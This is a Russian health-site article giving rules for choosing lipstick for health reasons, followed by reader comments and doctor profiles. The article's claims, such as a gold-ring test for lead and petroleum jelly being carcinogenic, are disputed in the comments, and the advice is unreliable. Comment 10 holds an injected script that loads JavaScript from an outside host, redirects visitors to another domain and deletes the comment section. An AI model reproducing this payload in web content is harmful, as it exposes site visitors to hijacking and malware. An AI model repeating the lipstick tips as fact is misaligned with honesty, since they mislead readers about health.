Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Правила выбора губных пом...  >>  Правила выбора губных помад
 
Обратная связь
 

Правила выбора губных помад

Размер шрифта
20 марта 2012 10:00
  • google_analytics: false
  • Нравится

Знаете ли вы, что выбирать губные помады нужно не только по цвету? Существует несколько правил, которые помогут подобрать идеальную помаду для вашего здоровья.

1

Проверяем на свинец

До сих пор в некоторых помадах в составе есть свинец. Его наличие легко выявить: нужно нанести на кисть руки помаду и потереть ее золотым кольцом.
Если помада потемнеет – в ней содержится свинец.

Что делать

Покупайте ту помаду, которая не меняет свой цвет при взаимодействии с золотом.

Избегаем глицерина

При использовании гигиенических помад, содержащих глицерин, мы не даем клеткам эпителия на наших губах отшелушиваться и сменяться в нормальном режиме – глицерин их склеивает.

В зимнее время года, когда сухость воздуха в помещениях с 60-65% доходит до 20%, глицерин, вместо того, чтобы увлажнять губы за счет влаги из воздуха, забирает ее из кожи губ. Получается обратный эффект.

Поэтому вполне объяснимо, почему гигиеническая помада сушит губы.

Что делать

От пересушивания спасет увлажнение изнутри и снаружи: пейте не менее 2-х литров в день и увлажняйте воздух в помещениях.

Выбираем воск

В состав помады входит либо воск, либо вазелин, один из которых – основа любой помады. Информацию об этом можно прочесть на упаковке. Если женщина постоянно пользуется помадой, на основе вазелина, то за 10 лет она съедает целое ведерко этого вещества.

Вазелин – нефтепродукт, поэтому при попадании в организм он действует как канцероген.

Что делать

Замените помаду с вазелином на помаду с воском.

Помните, что красота – это прежде всего здоровье. Помада должна подчеркивать эту красоту, а не вредить ей. Выбирайте правильную помаду для вашего здоровья.
 

 
Сюжеты по теме:
На вкус и цвет. Опасности губной помады

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

20 марта 2012 в 19:49

Цитировать   |   Пожаловаться

Губная помада со свинцом.Я уже один раз отдавала подобную помаду на анализ в химлабораторию РГУ-свинца не обнаружили. Опять глицерин-даже не хочется комментировать,но глицерин на губы в чистом виде никто не наносит. Полный бред. Вазелина в губной помаде тоже нет.уже писала.и не все продукты из нефти-канцерогенны. 

Температура плавления вазелина 28С,в губную помаду добавляют церезин или высокоплавкий парафин,плюс разные воски,парафин-он совершенно безвреден,как и множество других нефтепродуктов.Ежели бы в губной помаде был вазелин,то даже при обычной комнатной температуре она расплылась.А помадой мы пользуемся и летом,когда температура значительно выше 28С.

his shadow 20 марта 2012 в 19:49
свинца не обнаружили
 Отлично. Вы купили качественную. Но ведь есть и низкого качества. Есть с воском, но есть и с вазелином, с отвердителями. 
А если кто-то прочтет надпись на упаковке и не приобретет некачественный продукт, разве это плохо. 

3 - helena

31 марта 2012 в 12:33

Цитировать   |   Пожаловаться

Да нет помады с вазелином, и никаким отвердителем его не отвердить, если у него температура плавления низкая. Все смеси с ним будут плавиться при еще более низкой температуре!

4 - his shadow

29 апреля 2012 в 18:54

Цитировать   |   Пожаловаться

Медицинский Модератор 29 марта 2012 в 17:01
Отлично. Вы купили качественную. Но ведь есть и низкого качества. Есть с воском, но есть и с вазелином, с отвердителями.
 Да я то как раз и отдавала на анализ губные помады разной стоимости и разных фирм,и, как вы говорите-качественные,и -дешёвые.
И так же помаду.на которой золотое кольцо оставило тёмный след-свинца там не было.
Теперь о вазелине и отвердителях.
Вазелин-это смесь парафиновых углеводородов и минерального масла.Минеральное масло-это жидкие парафины и нафтены.с длинными углеводородными цепочками,в качестве "загустителя" в таком случае-может быть только церезин-высокоплавкий парафин или различные природные(карнаубский или пчелиный) воски.
"Вазелиновое масло медицинское (парафин жидкий) — это специальное высокоочищенное масло, в составе которого нет вредных органических веществ и их соединений. Это бесцветная маслянистая жидкость без запаха и вкуса.
Исследованиями, проведенными специальными медицинскими учреждениями (в частности НИИ Химии и технологии лекарственных веществ, Онкологическим центром), установлено, что вазелиновое масло не оказывает отрицательного влияния на жизненно важные органы, не обладает эмбриотическим, мутагенным и канцерогенным действием, а также кумуляцией, т.е. способностью накапливаться в организме человека и полностью выводится из него. При приеме внутрь вазелиновое масло не всасывается."
Так что-про парафины и  их смесь с минеральным маслом.которую Малышева, по какой-то причине называет вазелином-давно всё известно.

his shadow 29 апреля 2012 в 18:54
Вазелиновое масло медицинское (парафин жидкий) —
 Может быть и не стоит в качестве доказательства безопасности вазелина цитировать сайт его продавца - ООО "В...кс-Трейд",  -  у него свой интерес, ему продать надо. Так любой продавец на рынке или на международной ярмарке свой товар нахваливает.  
Исследования, на которые сайт ссылается, в Советском Союзе производились давно, а канцерогенность производных нефти - стала актуальной сравнительно недавно. 
К тому же все научные утверждения имеют право на пересмотр и переоценку, сегодня исследования идут на порой атомарном, электронном  уровне, постоянно появляются данные о новых, ранее не известных свойствах самых знакомых и привычных нам вещей...  а нефть является крайне агрессивной для человека субстанцией. 
Доступными и известными всему миру новостями в этой и области делится наша программа с вами. Вы вправе, услышав их, поверить или усомниться, менять свои привычки или нет -  это Ваш выбор. Публицистическая программа - останется таковой, какая она есть.  

6 - his shadow

09 мая 2012 в 19:54

Цитировать   |   Пожаловаться

Медицинский Модератор 05 мая 2012 в 16:03
Вы вправе, услышав их, поверить или усомниться, менять свои привычки или нет -  это Ваш выбор. Публицистическая программа - останется таковой, какая она есть.  
 Да я просто и есть тот самый производитель парафинов.
И я знаю-как его получают. что в нём есть и чего в нём нет.
Потому как исследовала лично состав получаемых мною парафиновых углеводородов.
И уверяю вас-никаких канцерогенных веществ в нём нет.
Особенно в тех.что идут для пищевой или фармацевтической промышленности.Иначе бы просто запретили все кремы и мази на основе любимого Малышевой вазелина.
Ну нат там канцерогенщины.
И передача вводит в заблуждения как раз не меня- я знаю, что и как получается.а людей.которые сидят с тетрадочками и записывают то что говорит Е.В.Малышева.

his shadow 09 мая 2012 в 19:54
И передача вводит в заблуждения как раз не меня- я знаю, что и как получается.а людей.которые сидят с тетрадочками и записывают то что говорит Е.В.Малышева.
Корпорации, производящие изделия из табака, вкладывают средства, финансируют разработки высокой сложности для того, чтобы найти возможность оправдать табакокурение, пытаются отрицать вред и канцерогенность дыма, смол, табака, сигаретной бумаги и т.д.. 

Только это ничего не меняет. Курение и рак связаны неразрывно - это неоспоримо, доказано и отрицать это бессмысленно. 

И ядерные взрывы когда-то у нас считались полностью безвредными...

В вопросе вреда нефтепродуктов ведущая программы не выдумками своими делится, "с целью навредить кому бы то ни было", .. 
Лет 25 назад, еще во время учебы, на лекциях нам рассказывали про "съедаемую" за жизнь помаду, про канцерогенность нефти и всех нефтепродуктов. ... 
Ничего особенно нового в этом вопросе нет. Плохо, что для широкого информирования о наличии вреда в использовании  давно известных вещей, нам требуются публикации в мировой медицинской и литературе и публицистике. 

8 - his shadow

10 мая 2012 в 13:22

Цитировать   |   Пожаловаться

Поднимите трубку телефона и позвоните во ВНИИНП, хотя бы.

9 - his shadow

11 мая 2012 в 08:39

Цитировать   |   Пожаловаться

Господа редакторы передачи Жить ЗдОрово!
Прошу вас.перестаньте веселить думающую и грамотную часть аудитории этой передачи)))

Ну как вчера можно было воспринять совет, из уст г-жи Малышевой, что при стрессе нужно жевать жевательную резинку.
Механики происходящих в организме процессов касаться не буду-не специалист, но как химик нахожусь в состоянии лёгкого шока.

Состав жевательной резинки:
"Состав жевательной резинки Dirol: 
изомальт, сорбит, маннит, ксилит, мальтитный сироп, аспартам, ацесульфам-К, резиновая основа, карбонат кальция 4%, ароматизаторы натуральные: мята, ментол, иденчиный натуральному ванилин, искусственный освежающий, загуститель E414, стабилизатор E422, гидрогенизированное рапсовое масло, эмульгатор E322, краситель E171, глазирователь E903, антиоксидант E321, текстуратор E341iii. "

Состав жевательной основы.

"Жевательной основой резинки являются натуральные латексы, смолы, пара­фин, текстурирующие вещества (тальк, карбонат кальция), за счет которых под воздействием имеющейся в полости рта температуры происходит раз­мягче­ние жевательной резинки. "

И это вам не губная помада.которую я могу нанести на короткое время и потом стереть( при этом, я знаю, что парафин- безопасен для организма), но это, простите-жевательная резинка.И её компоненты прямиком попадают к нам в организм.
И слово "парафин", не говорю уж об остальных химических добавках (Е.Е.Е. ксилит и сорбит) вас и Малышеву не пугают????

Ну тщательнее готовьтесь к передачам.А то ведь у вас одна передача полностью опровергает следующую)))))))

10 - zzzzzz

30 июня 2015 в 23:49

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.